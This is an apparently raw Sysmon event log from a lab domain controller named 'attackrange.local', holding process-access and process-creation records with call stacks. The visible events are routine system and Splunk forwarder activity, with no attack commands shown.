12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6D00-00000000AE01}3864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6D00-00000000AE01}3864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.958{266CAFBE-6482-6064-6D00-00000000AE01}3864C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6C00-00000000AE01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6C00-00000000AE01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6C00-00000000AE01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.849{266CAFBE-6482-6064-6C00-00000000AE01}4036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.752{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.752{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 